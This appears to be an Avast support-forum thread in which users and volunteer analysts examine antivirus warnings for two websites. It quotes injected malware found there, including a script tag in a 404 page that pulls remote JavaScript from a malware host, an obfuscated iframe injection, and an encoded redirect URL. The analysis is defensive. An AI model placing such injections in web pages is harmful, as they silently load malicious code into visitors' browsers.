Virus message on a specific website

[REDACTED]

Hi,

I still get a virus warning for a specific website. I contacted the provider to check the files on the webserver. I checked my PC several times, both actions does not result in finding the JS:includer-ZG[trj] virus. what can be the reason?

I'm using the free version of avast.
Program version: 2014.9.0.2012
definitions file: 2502.923

the website is www.jmiaa.nl

maybe is just me 

[Asyn]

-> http://sitecheck.sucuri.net/results/www.jmiaa.nl/

[REDACTED]

Just for kicks...  Avast! indicates the trojan appears to be in the Favicon Icon.  This is not surprising, as Favicon and many browsers are very... flexible... about what constitutes an "icon".  It need not always be a .ico format 

Sucuri flags

Website Malware   malware-entry-mwjs150?v28   huup://wxw.jmiaa-nl/404testpage4525d2fdc ( View Payload )
Website Malware   malware-entry-mwjs150?v28   huup://wxw.jmiaa-nl/404javascript.js ( View Payload )

Known javascript malware. Details: http://labs.sucuri.net/db/malware/malware-entry-mwjs150?v28
<script src=huup://amusecity-com/ii/smple.php ></script><BODY>

Gordon.

[HonzaZ]

The favicon.ico returns a custom 404, which is infected:

...
<TITLE>404 Not Found</TITLE>
</HEAD>
<script src=hxxp://amusecity.com/ii/smple.php ></script><BODY>
<H1>Not Found</H1>
...

[REDACTED]

So now the question is...  What's on that site, which seeks to infect you just by visiting it, that you really want to see?

-Noel

[polonus]

Must be not an interesting enough scam to be willing to get exposed to  the following threats. 

Well the payload of this is more than likely:  [element] URL=amusecity dot com/gzcr?t=ZD1hbXVzZWNpdHkuY29tJmRpPTQ2ODE4NzQmYz0yMzQmaWE9MCZpdWY9MCZydT1hbXVzZWNpdHkuY29tJTJGaWklMkZzbXBsZS5waHAmcj0mdT0yMzI2 sending you here htxps://www.bodis.com//market//checkout
and there is where you get all the reds and goodies, read here for some user's ratings:
-> https://www.mywot.com/en/scorecard/bodis.com?utm_source=addon&utm_content=warn-viewsc
Scam, malware and viruses & Co awaiting you there.
Seen enough, be glad avast blocked you from getting infested going there.

polonus

[REDACTED]

-> http://sitecheck.sucuri.net/results/www.jmiaa.nl/

I was going to do this via Avast Feedback, but likely more people would see it here.

I'm also getting a whole-site false positive for  http://www.stream-recorder.com/forum/

It reports:
"Infection Blocked"
Infection: JS:Includer-BFY [Trj] "

I have no reason to believe this is accurate. Virustotal reports 0 / 59 for a scan of this URL.

Avast is not even consistent on this, because the Avast WebRep browser plug-in gives the site a green 'O.K.' checkmark.

The alternate sitecheck link you suggest looks interesting, but they are promoting their own product for sale, and so might not be considered a neutral party.
When I fed it the url, it says that site runs on outdated software -- an older Apache server, to be specific.  So ?  I'm not going to let that stop me from visiting a very useful forum, or from white-listing it in Avast. 

[polonus]

Hi JF-111

For the first detection discussed, convince yourself here: http://jsunpack.jeek.org/?report=353b4da59bb8be2f1196e35404e9bd54dbcefca5
Link for security researchers only, open up with NoScript active and in a VM.

In your case for what you reported, JF-111, the iFrame check on that url falls through: Suspicious

<iframe onload='oqybcm();' src='"+af4g2+"' width=19 height=19 frameborder=0 scrolling='no'></iframe>";document.body.appe etc.  avast! Webshield detects and blocks this as JS;Includer-BFY[Trj]

Not only avast and Sucuri flag, also here 94 out of 100% malicious: http://zulu.zscaler.com/submission/show/b017087b6610875ea65432b2e7e4122b-1412633354

see: http://jsunpack.jeek.org/?report=f5a85c7727bfdc3cdf5a866d2b446ad3c77e49d8
Link for security researchers only, open up with NoScript active and in a VM.

polonus (volunteer website analyst)
Google browser difference found: Google: 94196 bytes       Firefox: 107066 bytes
Diff:         12870 bytes

First difference:
ionurl = "s=5e549ffc5984906d7f7d9a5343aae6e7&"; var imgdir_misc = "images/misc"; var vb_disable_ajax = parseint("0", 10); // --> </script><script type="text/javascript...

Make the admins on these forums aware of an outdated server software problem:
ISSUE DETECTED   DEFINITION   VULNERABLE HEADER
Outdated Web Server Apache Found   Vulnerabilities on Apache 2.2   Apache/2.2.26 (Amazon) PHP/5.3.28
exploitable: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6420
So that forum site now is vulnerable!!! Site is therefore blacklisted by Yandex: http://killmalware.com/www.stream-recorder.com/forum
This external link from site htxp://cdn.buyorselltnhomes.com/ has been blocked for me as well by an extension.

polonus

[bob3160]

I have no reason to believe this is accurate. Virustotal reports 0 / 59 for a scan of this URL.

Avast is not even consistent on this, because the Avast WebRep browser plug-in gives the site a green 'O.K.' checkmark.

WebRep are users ratings not security or risk related. If the infection is new, it wouldn't show up there anyway.
Someone is always first with discovering an infected site. Since avast! has 220 Million users worldwide, it usually doesn't take long for
someone to auto send information about a new infection to the avast! virus lab.
Today's safe site can be tomorrows carrier of an infection.
Follow polonus's advice.

[polonus]

As bob3160 remarks an infected website (whenever established as being infested or spreading malcode) seldom goes unnoticed and automatically all big vendors are informed to add it to their detection patterns. Malware as a rule does not stay long on a website unless it is intentional and this is called OVERDUE! status, staying on for over 3000 hours and more.
The phase that a website could stay vulnerable and attractive to be attacked, exploited and often re-infested could be much longer when the security issues on a site are not being tackled. First comes outdated CMS, vulnerable third party code, plug-ins, themes, SE spam injections, iFrame malware and a long row of other issues, but also vulnerable server and PHP software versions that make these attacks worth while (in JF-111's example it was brought to my attention that there are approx. 28 XSS attack sinks there) are continuing threats.
There we also see a lot of insecurities with server HTTP header configuration that makes it the more attractive for attackers to seek known exploits against this when the info is spread to the world and attackers alike. When your domain for instance is hosted on one and the same IP with some thousand others and you have a hosting party where money comes first you could imagine where that can lead to. Most Internet users are not always fully aware that that is the general situation we are in.

regards,

polonus